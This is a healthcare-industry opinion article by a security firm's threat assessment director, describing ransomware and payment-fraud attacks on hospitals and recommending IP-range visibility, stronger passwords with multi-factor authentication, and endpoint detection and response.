Attacks against healthcare providers are increasing in severity, with hackers demanding multiple ransomware payments.
In December, the Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) released a joint advisory warning several industries, including healthcare, that threat actors using Cuba ransomware had infiltrated hundreds of companies.
While the threat was observed as early as November 2019, the pace of attacks picked up in December 2021, with double the number of previous attacks between December and August 2022. Globally, the ransomware attack victimized 100 companies and generated more than $60 million in ransom for criminals.
Just as healthcare is dynamic, so are the cyber threats facing organizations. New threat vectors pop up regularly, requiring vigilance in monitoring IT infrastructure, evaluating anomalies, and remediating any discovered weaknesses. Each staff member, device, technology connection, API, and third-party vendor or business associate increases your organizational risk.
Unfortunately, attacks against healthcare providers are increasing in severity, with hackers demanding multiple ransomware payments, failing to provide access details, publishing data for extortion, or trashing data just because they can.
In September, the FBI outlined three attacks against healthcare organizations that netted more than $4.6 million in ill-gotten gains. The agency said hackers used multiple methods — including publicly available personal details, social engineering, phishing, and spoofing support centers — to impersonate victims and gain access to banking details. In two instances, hackers used credentials from a healthcare company to shift the direct deposit details of a hospital to an account they controlled, stealing $3.8 million. In another, an impersonator was able to change Automated Clearing House (ACH) instructions to swindle another company out of $840,000.
These are but a few examples of the internal and external threats hospitals and health system IT teams deal with daily. IT departments are often cost-constrained and forced to choose among equally important cybersecurity initiatives. Cybersecurity is often considered a cost center because it doesn’t directly benefit patients. However, breaches too-often prevent hospitals from delivering care — diverting patients to other facilities or delaying care for others.
But safeguards exist that can thwart bad actors from exploiting three key vulnerabilities needed to conduct a successful breach: visibility into a target system, the ability to interact with the target, and the capability to execute on that interaction. Understanding the potential threats and taking the following threeproactive steps can help secure your networks.
1. Know your (IP) range
Your IT systems are under constant scrutiny, whether by search engines benignly trolling so they can create better search functionality or by your internet service provider to see which ports are open so they can manage their own security or prevent improper outbound traffic. These scans return basic information about what operating systems are in use, website coding, and more.
But bad actors may also be scanning your network, probing for vulnerabilities. The key to controlling visibility is understanding your IP space, your perimeter, your systems, and your potential weak spots. We’ve had clients request penetration testing who didn’t know their IP ranges, which is critical information they should be able to access easily. Automate your visibility practices to make threat management easier.
2. Manage password strength
The simplest path into your systems is through a compromised password. Even in organizations using single sign-on (SSO), passwords are often poorly implemented and managed, allowing users to select common words and phrases that hackers can easily break.
In addition to requiring longer passwords and the use of numbers and characters, consider banning the name of local sports teams or other commonalities shared in a locale. And, if possible, restrict the use of the same passwords across devices or logins. Multi-factor authentication, when deployed fully and properly, can provide additional protection from unauthorized logins.
3. Implement endpoint detection and response
Finally, organizations need to thwart a hacker’s ability to execute malicious software or actions within their network.
Many organizations still deploy traditional antivirus software, which does a fine job removing known viruses, but does nothing to combat what’s known as “living off the land.” This is a practice where criminals gain access to systems and, rather than causing a big, noticeable scene by immediately launching malware or locking up data, they remain in stealth mode, moving through your network and stealing as much information as they can for as long as they can. And then in true bad-actor fashion, just before they’re caught or when they think they have all they can get, they cause a big scene by launching malware or ransomware.
To be truly effective in thwarting attacks, healthcare organizations need to advance their understanding of what response capabilities can bring enhanced detection both from a technical perspective and from a behavioral perspective. The result is higher visibility, not simply to quarantine compromised files but also to sever connections with machines that have been accessed in an unauthorized manner. That’s why endpoint detection and response (EDR) software is growing in popularity.
Hospitals and health systems make investments every day to improve their facilities, upgrade equipment, and invest in new technologies to enhance patient diagnosis and treatment. Similarly, investing in IT infrastructure is critical to protecting hospital networks, systems, and software, and for maintaining care delivery.
TJ Ramsey is director of threat assessment operations for Fortified Health Security. The company recently released the “2023 Horizon Report” on the state of cybersecurity in healthcare.